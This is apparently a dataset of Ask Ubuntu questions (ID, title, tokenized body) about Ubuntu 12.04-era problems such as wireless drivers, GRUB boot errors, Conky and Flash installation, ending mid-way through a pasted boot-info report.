136463	web pages not appearing	i have both 12.04 and 11.10 installed on the same machine . internet ( both wireless and wired ) is n't working on 12.04 . any help ? lshw -c network pci ( sysfs ) *-network description : ethernet interface product : 82567lf-2 gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 00 serial : 00:21:9b:1b:9e:31 capacity : 1gbit/s width : 32 bits clock : 33mhz capabilities : pm msi bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000e driverversion=1.5.1-k firmware=1.8-5 latency=0 link=no multicast=yes port=twisted pair resources : irq:43 memory : f9dc0000-f9ddffff memory : f9df4000-f9df4fff ioport : a080 ( size=32 ) *-network description : wireless interface product : ar5418 wireless network adapter [ ar5008e 802.11 ( a ) bgn ] ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 00:22 : b0 : ce : f1 : ff width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-24-generic firmware=n/a ip=192.168.1.129 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : f9ef0000-f9efffff iwconfig lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' fastweb-1-bztali1hzeat '' mode : managed frequency:2.437 ghz access point : d4 : d1:84:02 : f0:80 bit rate=54 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=52/70 signal level=-58 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:914 missed beacon:0 eth0 no wireless extensions . -
136466	checking battery status using other that acpi	is there any way to get the battery status without acpi ? i 'm using u 11.10 and i needed to install acpi via apt-get . so i guess there 's another command that is used to check battery status rather that acpi .
136471	how to invoke the shutdown dialog in docky under lubuntu 12.04	i want to create a button in docky equivalent to the shutdown button in lxpanel . i have found that i can create a .desktop file which runs lubuntu-logout and this does the trick . but when i try to drag that file into docky i get an icon that looks like a document . when i click on that icon it opens up the .desktop file . i have tried making the .desktop file executable . any suggestions as to how i can make the button run lubuntu-logout instead ? what am i doing wrong ?
136473	how do i change the icon theme in ubuntu ?	i want to change my icon theme to faenza . i tried using myunity , but it did n't work so well . how can i change it ?
136474	nl80211 not found message when using iw commands	i have ubuntu 10.04 installed on my mac using oracle virtualbox . my machine is connected to wi-fi and am able to browse the internet from within ubuntu as well . i keep getting the `` nl80211 not found '' message when i try some iw commands like `` iw dev wlan0 scan '' , etc ... iwconfig config shows the following output . lo no wireless extensions . eth0 no wireless extensions . could the message be because wlan0 is not being detected ? why is that i am not able to see my wireless chipset details . the card type is `` airport extreme `` and firmware version is broadcom bcm43xx 1.0 ( as per systeminformation in mac ) lspci shows the following output . 00:00.0 host bridge : intel corporation 440fx - 82441fx pmc [ natoma ] ( rev 02 ) 00:01.0 isa bridge : intel corporation 82371sb piix3 isa [ natoma/triton ii ] 00:01.1 ide interface : intel corporation 82371ab/eb/mb piix4 ide ( rev 01 ) 00:02.0 vga compatible controller : innotek systemberatung gmbh virtualbox graphics adapter 00:03.0 ethernet controller : intel corporation 82540em gigabit ethernet controller ( rev 02 ) 00:04.0 system peripheral : innotek systemberatung gmbh virtualbox guest service 00:05.0 multimedia audio controller : intel corporation 82801aa ac'97 audio controller ( rev 01 ) 00:06.0 usb controller : apple computer inc. keylargo/intrepid usb 00:07.0 bridge : intel corporation 82371ab/eb/mb piix4 acpi ( rev 08 ) 00:0d.0 sata controller : intel corporation 82801hbm/hem ( ich8m/ich8m-e ) sata ahci controller ( rev 02 ) could anyone help me out ?
136477	internet does n't work on xubuntu 12.04 via wi-fi connection	i have a problem with internet on xubuntu 12.04 via wi-fi connection . i have a wi-fi router without any encryption . i try to connect to the wi-fi router , i see the connection , but i can not visit any website . i found another one wi-fi router ( not mine ) also without any encryption and i can connect to this wi-fi router and visit websites . can anybody give me an advice what should i do to resolve my problem with my wi-fi router ?
136480	ubuntu 12.04 usb installation problem - login page	i 'm trying to do a fresh install of ubuntu 12.04 from a usb drive . i downloaded the iso file and loaded it onto the usb drive with from my existing ubuntu 11.10 with the usb startup disk creator . when i boot from the usb drive , it loads the login page and asks for user name and password . i 'm not sure what to do at this point . i tried to login with my 11.10 user name and it does n't work . i 've installed previous versions of ubuntu from a usb drive and this has never happened -- it usually takes me straight to the desktop from where i can run the installer . what do i do ?
136481	how to change password using usermod ?	i am superadmin of a server and like to change password of an existing user . how can i do that ? i tried usermod -p 'new-password ' john but it did n't worked ?
136487	screen display wo n't turn on	i installed ubuntu with wubi , using 30gb of space on my third hard drive on my desktop . when i restarted my computer , i was shown the windows boot manager . when i chose ubuntu it made some noises ( like bongos or something ) but my screen went black . i tried restarting my computer , same thing . i have an amd raedon 6550 graphics card and a dell 19 '' lcd monitor .
136489	12.04 upgrade deletes home files	i had ubuntu 11.04 32-bit installed with 5 users . home folder has its own partition . i was planning to install ubuntu 12.04 64-bit so i booted from the live cd and was going to manually select partitions . this was going to remove all installed packages but would have kept all user files and settings . i saw a new option for installation that said upgrade to 12.04 while keeping all files and most packages . but after installation none of the packages were there , also all user folders under home were empty . the folders were there , but all files were gone . only default empty folders for each user were there . i do n't care much for packages , all i want is to get the files that were under each user home folder back !
136493	how can i get instant messenger with my logitech webcam c110 ?	i 'm new in linux , i 'd install ubuntu . i have a logitech webcam c110 , i think ubuntu can use coz in the installation ask if i want get photo for image user ; i 'd install pidgin ( instant messenger for internet ) . i dont know how to use webcam in pidgin and facebook , i do n't know if i need config somethig in the webcam or if its problem of the programs ( config or maybe use other different program ) , or maybe i need change my webcam
136495	i deleted my original user account . the new account has no password . how can i enable it ?	how can enable my admin account ? i deleted the other one and now the new one is without password and i cant access it and cant do anything with my guest account .
136496	turning ubuntu 12.04 entirely grey/b & w/monoscale	does anyone know a way to change the color settings of the entire display to grey ( or saturation to zero ) ? i have compiz settings manager installed if that helps but do n't know how to do it there .
136499	why does a large podcast mp3 file fail to download when using the ubuntu one files app for android ?	i recently wanted to try out ubuntu one for the first time . as well i installed it on my htc hero , and everything seemed to be syncing as it should . i 'm a podcaster by the means of that i want to sync the large mp3 file in ubuntu one , and listen to it on my phone . it syncs as it should , but it report a fail to download , and tells me i can 'tap to resume ' , but nothing happens when i tap . it 'll let me download images and such , but not this podcast . a bit about my settings , ah , i sync for wifi only- not the mobile network . i have space on the sd-card to make a long story short : ubuntu one wo n't download specific files . i hope i provided enough information to all of you ! best regards , frederik .
136501	thunderbird does not open when i use `` send link '' in firefox 12.0	thunderbird 12.0 does not open when i use `` send link '' in firefox 12.0 . thunderbird is working and running . the usual new mail window does not appear . in firefox : edit → preferences → applications → mailto is set to `` use thunderbird mail '' . i tried to set this to `` always ask '' , when i try to send something , i can select `` thunderbird '' , but nothing happens , when i press `` ok '' . ( also , in about : config `` network.protocol-handler.external.mailto '' is set to `` true '' . ) by the way , i use gnome instead of unity . can this be the reason for this behaviour ?
136504	exit firefox from shell script	i 've already tried pkill -19 firefox , but it crashes . at the next start it asks if the last session should be opened again . is it possible to terminate the browser without crash ?
136507	what does my computer do when i click 'shut down ' ?	what does my computer do when i click â¸ shut down ? i mean , is it running a script ? what is it running ?
136509	language error prevents me of creating folders at desktop	my issue is the following : when i created my user , i decided switching to english instead of spanish wich was the original language installed , so now when i logged in ubuntu notified me that if i wanted to replace the old spanish names from the folders , to english , i acepted.. now when i try to create a folder in desktop , it pops up an error saying that is `` unable to copy because there 's an `` error when getting information for file '/home/**/escritorio ' : no such file or directory , is making reference to the old spanish desktop name . how do i change this route ? do you think this is affecting the wallpaper that appears at the login screen ? cause it does n't appear anymore . thanks , for your attention . regards .
136515	how to always show menu in firefox ?	how do i get the application menu to be placed inside the firefox window ? i 'm running ubuntu 11.10 and firefox 12.0 . i like unity as a whole , but the mac-style `` globalmenu '' idea provides bad usability -- especially other users on my computer never find the menu and that prevents them from doing several tasks , like printing . i 've run the command sudo apt-get remove indicator-appmenu to put the menu back into the application window for most applications -- except firefox . i 've seen that there have been tricks to achieve the reverse , probably with older firefox versions that did n't support globalmenu yet . is n't there a similar trick to go the other direction now ?
136522	newly installed xubuntu does n't start	i installed xubuntu instead of normal ubuntu i asked about yesterday , but now i have another problem . i already installed system , but i ca n't boot it . after grub and `` choose system to boot '' window there is a cursor flashing in top-left corner and after that i receive a message : gave up waiting for a root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/48eac13e-a49f-4c5c-bb25-cb81b900bbbe does not exist . dropping to a shell ! busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( sh ) enter'help ' for a list of built-in commands . ( initramfs ) and that is all i can do . after booting system in a safe ( or recovery ? i do n't remember the name ) i also can see a long list of things performed , but the result is the same . message as above . i installed xubuntu on the same disk with winxp . livecd ( or rather liveusb ) runs normally , even fast . my computer has pentium 4 2.4 ghz , asus p4v8x-x motherboard , 768 mb ram , radeon 9200 , 120gb samsung hdd ( not even sata ) . edit : i chose option to install new xubuntu on the place after unsuccessful installation of previous ubu , which is an option `` windows and ubu side by side '' or something . nothing special .
136523	problem with ubuntu 12.04 installation	i recently bought a new laptop : asus n55sl . i 've tried to run ubuntu 10.04 lts on it . i was extremely happy with it on my previous hp pavillion 6195 . i have 5 partitions : ntfs win7 recovery partition ntfs win7 home premium os partition ntfs data partition ext4 / ext4 /home swap ( 16 gigs ) now : ubuntu 10.04 lts installs perfectly . but does n't recognize most of the brand new peripherals : graphics card , wlan card , eth card . i 've been waiting patiently for the release of ubuntu 12.04 lts ... if i boot from a live distro it works like a charm . even the webcam gets recognized properly ! but i do n't manage to get installed on the disk properly ! attempt tried : manually install the network card driver on 10.04 and do a distro upgrade -- failed install the live with the network connection enabled -- failed as .2 but without network install on a single ext4 partition without a separate /home -- failed the installation freezes after writing about 2.1 gb on disk . the cpu start getting hot ( fan speed raves high like crazy ) . if i force a shutdown with the power button i do n't get grub loaded during boot . luckily if reinstall ubuntu 10.04 back everything gets properly restored . thanks for helping .
136529	how to exclude a folder from a kdevelop project ?	currently my o folder is appearing in my kdevelop project tree , and therefore .o files appear in the open file completion list . is there a way to exclude certain folders from kdevelop 's view of the project ? i 'm using kdevelop 4.3 .
136532	wireless interface not found on a macbook 4,1	i spent the last several days trying to figure this out , only finding results for the macbook pro 8 , x model series . symptoms : no wireless connectivity ifconfig shows only eth0 ( wired ethernet ) interface
136538	gedit shortcuts stopped working	suddenly the gedit shortcuts stopped working . for example , ctrl+f , instead of finding a string makes the cursor to the next character . ctrl+h now has the same functionality as backspace . i tried uninstalling and reinstalling gedit , removing plugins , removing preference files etc , but nothing has worked . has anybody experienced the same issue ? if so , what is the solution ? i am using precise pangolin , everything is updated to their latest verions . thank you in advance .
136539	display remains in sleep/suspend mode but machine is not in sleep mode	first , this is not a laptop , but a desktop machine . i am running precise pangolin . i often notice that , when i am away from my computer for a while ( usually at least 15 minutes or so ) and come back , the monitor will be black , and the monitor 's power indicator will be orange rather than the usual green , so i just assume the computer is in suspend mode . but then i move my mouse , type on the keyboard , etc. , and the display stays in the same state . the power indicator on the tower itself is solid green ( on ) all throughout this process . whenever this happens , i end up having to push and hold the computer 's power button to turn off and restart the computer . i have looked for similar questions , and the closest i can find are questions about laptops relating to suspend/hibernate mode . does anyone know what could be going wrong ? edit ( 5/21/12 ) : this is happening less often now , but it still happens . my temporary solution is to force the machine to suspend anytime i know i 'll be away for more than 5 minutes . it is n't ideal , but at least it keeps me from having to `` brute-force shutdown '' , and possibly lose a lot of data , quite as often .
136544	do i need additional graphics drivers win an intel hd graphics 2000 ?	i use both linux ubuntu 12.04 and windows 7 on my desktop which has intel hd graphics 2000 . do i require additional drivers for the linux operating system to use the hd graphics and if so , will these drivers effect how the windows os operates ?
136553	how to hide mouse cursor while using hud in unity 2d ?	i want the mouse cursor to hide when i press the hud key alt . it should toggle back on if i press alt again or press enter . problem : when you press alt showing the hud , pressing enter should execute the first result . however , it will instead select whatever random thing the mouse happens to be over . example : you press the alt key then type `` mu '' then enter . this would normally mute the audio , unless your mouse happens to be over one of the other results in the hud . is there a workaround or solution for this ? edit : this problem is for unity 2d .
136554	asus 1018p dead after upgrade to 12.04	i was successfully running 11.10 and upgraded through the software update . everything was running perfectly until i did a reboot . now when i hit the power button the light comes on and the wireless indicator light comes on , but nothing else . i have tried to boot from usb , i have tried to boot into the bios , i have tried every hot key startup combo in the manual and i still get nothing ... any ideas ? ?
136556	google sinhalese installation failed	i installed ubuntu 12.04 3 days ago an have never used it before . i wanted to install an ime for sinhala so i tried installing google sinhalese input via wine following the instructions from the community documentation on wine . at the last step the following error message appeared : '' google installation failed with error 0x80040154 '' '' the installer could not connect to the internet.ensure that your computer is connected to the internet and your firewall allows googleupdate.exe to connect then try again '' . my computer was connected to the internet , and i have no idea of firewall settings on ubuntu , please guide me . thanks in advance . if it is connected to firewall settings , be kind to advice me how to change the settings . thanks . also let me know if there are alternatives .
136558	adding a network folder to clementine library	i have 2 machines running ubuntu . one of them contains a music library on its windows partition . i can connect to that computer 's music library via 'connect to server ' and save that location as a bookmark , but i ca n't figure out a way to add that folder/bookmark to my clementine library . any ideas ?
136559	guake does n't start when session starts	i 've ubuntu 12.04 installed . i 've added guake to startup applications but it does n't work . all programs listed in startup application are working except guake . what should i do ?
136562	does my laptop have bios or efi ?	i have a sony vaio s series laptop ( model : vpcse190x ) http : //store.sony.com/webapp/wcs/stores/servlet/categorydisplay ? catalogid=10551 & storeid=10151 & langid=-1 & categoryid=8198552921644768015 # /s15specificationtabcontent is there a command or method i could use to find out if my laptop has bios or efi ?
136563	is there a skin for vlc that would allow the same access and options as the native style ?	i mean a skin that would just improve appearance but without removing the options of the native style , like the main toolbar and the playlist options ( access to my music folder , freebox tv list and the like )
136564	booting and shutting down process is very slow , with some others issues	recently i 've installed ubuntu 12.04 replacing ubuntu 11.10 , after installation , when i started my `` lenovo w520 '' , i feel uncomfortable . it is too slow in booting process and also very slow in shutting down . some operations are very slow . the booting is so slow that , it 's seems it is a windows system instead of an ubuntu . can anyone suggest , what actions i can take to investigate the issue and then to fix the problem ? re-installation advice should be last option .
136566	wireless does n't work on an acer travelmate 5520g with a broadcom 4311	i have already install a clean ubuntu 12.04 in an acer . after the installation , the wifi was not detected . i have followed several bcm431x tutorials ( from this forum ) , but no-one worked out . in summary , i have tried installing b43-fwcutter & firmware-b43-installer packages , and also , in first instance , bcmwl-kernel-source . here is the lspci output . 05:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) subsystem : ambit microsystem corp. device 0422 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 32 bytes interrupt : pin a routed to irq 17 region 0 : memory at f0400000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel modules : ssb what can i do to solve the problem ? thanks in advice .
136569	trying to install flash player on ubuntu 12.04	i am having trouble installing this program . i do not know how to locate the browser plugins directory , or change the directory in the terminal . installation instructions installing using the plugin tar.gz : unpack the plugin tar.gz and copy the files to the appropriate location . save the plugin tar.gz locally and note the location the file was saved to . launch terminal and change directories to the location the file was saved to . unpack the tar.gz file . once unpacked you will see the following : + libflashplayer.so + /usr identify the location of the browser plugins directory , based on your linux distribution and firefox version copy libflashplayer.so to the appropriate browser plugins directory . at the prompt type : cp libflashlayer.so < browserpluginslocation > copy the flash player local settings configurations files to the /usr directory . at the prompt type : sudo cp -r usr/* /usr installing the plugin using rpm : - as root , enter in terminal : rpm -uvh < rpm_package_file > - click enter key and follow prompts installing the standalone player unpack the tar.gz file to execute the standalone player double-click , or enter in terminal : ./flashplayer
136576	conky show ram without buffers or cache	i am wondering if there 's a way to get conky to show the ram that is in use minus the buffers and cache . when i close a program , the ram usage goes down in htop , but in conky it stays the same . so i 'd like to see it represented correctly on conky . note in this picture , htop shows that there 's 1300mb of ram used , and conky shows 2.15 because it includes cache and buffers . here 's the chunk of conky code that deals with ram $ { font arial : bold : size=10 } $ { color white } memory $ { color darkslategray } $ { hr 2 } $ font $ { color dimgray } mem $ alignc $ mem / $ memmax $ alignr $ memperc % $ membar
136577	how to make geany understand the new html5 elements ?	for example < header > and < footer > are new html5 elements , but as it seems in the screen shot below both the elements are marked as red which probably means geany is telling : warining : unknown elements how can i make this normal ? what files do i need to edit ? update i found that when i revert back to default ( white background , as shown in morlunk 's answer ) theme then no error occurs . any way to make this happen in my theme ? because i do n't want to leave dark theme
136579	12.04 upgrade broke grub ? ( not wubi related )	i just updated from 11.10 to 12.04 , with no major problems ( it took a while to get past a request to restart ssh , mysql and some other services , but i did no fiddling by myself , everything was done by the installer ) . however , after restarting , grub ca n't do anything . picking the new linux installation ( first entry ) , i just get error : no such partition error : no such partition error : no such partition and picking the recovery-version just gives 5 lines instead of 3 . i have windows 7 installed on a different drive , and can run it by booting from that drive instead . picking it from the grub menu gives the same error as above ( ca n't remember how many lines , though ) . i 'll be honest and say that i do n't remember if win 7 could be booted from grub before the update , though . in short , nothing on the grub menu works . any solutions ? the grub menu changed appearance - before it was on a purple background , small letters , now it 's white-on-black , big letters , looking very basic . the original installation was from a usb-drive , and i had n't heard about wubi until i started googling this problem , so i doubt there 's any connection . i really hope there are some grub-savvy people out there : ) edit : ok. so , i made a bootable usb , and am running from that right now . when i ran the bootinfoscript , it warned me that `` gawk '' could not be found , using `` busybox awk '' instead . this may lead to unreliable results . just so you know . the contents of results.txt are : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > windows is installed in the mbr of /dev/sda . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdb and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos3 ) /boot/grub on this drive . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdc . sda1 : __________________________________________ file system : vfat boot sector type : dell utility : fat16 boot sector info : no errors found in the boot parameter block . operating system : boot files : /dellbio.bin /dellrmk.bin /command.com sda2 : __________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda3 : __________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sda4 : __________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________ file system : vfat boot sector type : windows 7 : fat32 boot sector info : no errors found in the boot parameter block . operating system : windows xp boot files : /boot.ini /bootmgr /ntldr /ntdetect.com sdb1 : __________________________________________ file system : ntfs boot sector type : windows xp : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sdb2 : __________________________________________ file system : swap boot sector type : - boot sector info : sdb3 : __________________________________________ file system : ext4 boot sector type : grub2 ( v1.99 ) boot sector info : grub2 ( v1.99 ) is installed in the boot sector of sdb3 and looks at sector 375893584 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos3 ) /boot/grub on this drive . operating system : ubuntu 12.04 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sdb4 : __________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sdc1 : __________________________________________ file system : ntfs boot sector type : syslinux 4.06 4.06-pre1 boot sector info : syslinux looks at sector 4649656 of /dev/sdc1 for its second stage . syslinux is installed in the directory . the integrity check of the adv area failed . no errors found in the boot parameter block . operating system : boot files : /boot/grub/grub.cfg /syslinux/syslinux.cfg /ldlinux.sys ============================ drive/partition info : ============================= drive : sda _______________________________________ disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 63 240,974 240,912 de dell utility /dev/sda2 241,664 21,213,183 20,971,520 7 ntfs / exfat / hpfs /dev/sda3 * 21,213,184 483,151,863 461,938,680 7 ntfs / exfat / hpfs /dev/sda4 483,151,872 488,394,751 5,242,880 f w95 extended ( lba ) /dev/sda5 483,153,920 488,394,751 5,240,832 dd dell media direct drive : sdb _______________________________________ disk /dev/sdb : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 63 345,886,749 345,886,687 7 ntfs / exfat / hpfs /dev/sdb2 345,888,768 361,510,911 15,622,144 82 linux swap / solaris /dev/sdb3 * 361,510,912 390,807,786 29,296,875 83 linux /dev/sdb4 390,809,600 488,394,751 97,585,152 83 linux drive : sdc _______________________________________ disk /dev/sdc : 8015 mb , 8015282176 bytes 255 heads , 63 sectors/track , 974 cylinders , total 15654848 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdc1 * 2,048 15,652,863 15,650,816 7 ntfs / exfat / hpfs '' blkid '' output : ____________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 07d8-0411 vfat dellutility /dev/sda2 e2765bbc765b9061 ntfs recovery /dev/sda3 98dc5e54dc5e2d2e ntfs os /dev/sda5 7061-9df5 vfat mediadirect /dev/sdb1 01cbbb4c3374c3b0 ntfs data1 /dev/sdb2 1ca45f3f-f888-43d1-8137-02699597189a swap /dev/sdb3 6bc1b599-ad4b-403c-a155-a5bc81211f5e ext4 /dev/sdb4 58e2b257-8608-4b11-b20b-dc162bb80b62 ext4 /dev/sdc1 0c02b64402b63316 ntfs pendrive ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sdb4 /media/58e2b257-8608-4b11-b20b-dc162bb80b62 ext4 ( rw , nosuid , nodev , uhelper=udisks ) /dev/sdc1 /cdrom fuseblk ( rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , allow_other , blksize=4096 ) ================================ sda5/boot.ini : ================================ [ boot loader ] timeout=0 default=multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows [ operating systems ] multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows= '' microsoft windows xp embedded '' /fastdetect /kernel=ntosboot.exe /maxmem=1024 =========================== sdb3/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 6bc1b599-ad4b-403c-a155-a5bc81211f5e if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 6bc1b599-ad4b-403c-a155-a5bc81211f5e set locale_dir= ( $ root ) /boot/grub/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ 1 '' if [ `` $ 1 '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.2.0-24-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 6bc1b599-ad4b-403c-a155-a5bc81211f5e linux /boot/vmlinuz-3.2.0-24-generic root=uuid=6bc1b599-ad4b-403c-a155-a5bc81211f5e ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-24-generic } menuentry 'ubuntu , with linux 3.2.0-24-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 6bc1b599-ad4b-403c-a155-a5bc81211f5e echo 'loading linux 3.2.0-24-generic ... ' linux /boot/vmlinuz-3.2.0-24-generic root=uuid=6bc1b599-ad4b-403c-a155-a5bc81211f5e ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.2.0-24-generic } submenu `` previous linux versions '' { menuentry 'ubuntu , with linux 3.0.0-19-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 6bc1b599-ad4b-403c-a155-a5bc81211f5e linux /boot/vmlinuz-3.0.0-19-generic root=uuid=6bc1b599-ad4b-403c-a155-a5bc81211f5e ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.0.0-19-generic } menuentry 'ubuntu , with linux 3.0.0-19-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 6bc1b599-ad4b-403c-a155-a5bc81211f5e echo 'loading linux 3.0.0-19-generic ... ' linux /boot/vmlinuz-3.0.0-19-generic root=uuid=6bc1b599-ad4b-403c-a155-a5bc81211f5e ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.0.0-19-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 6bc1b599-ad4b-403c-a155-a5bc81211f5e linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 6bc1b599-ad4b-403c-a155-a5bc81211f5e linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sda3 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set=root 98dc5e54dc5e2d2e chainloader +1 } menuentry `` microsoft windows xp embedded ( on /dev/sda5 ) '' -- class windows -- class os { insmod part_msdos insmod fat set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 7061-9df5 drivemap -s ( hd0 ) $ { root } chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # =============================== sdb3/etc/fstab : ================================ # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sdb3 during installation uuid=6bc1b599-ad4b-403c-a155-a5bc81211f5e / ext4 errors=remount-ro 0 1 # /home was on /dev/sdb4 during installation uuid=58e2b257-8608-4b11-b20b-dc162bb80b62 /home ext4 defaults , user_xattr 0 2 # swap was on /dev/sdb2 during installation uuid=1ca45f3f-f888-43d1-8137-02699597189a none swap sw 0 0 =================== sdb3 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) = boot/grub/core.img 1 = 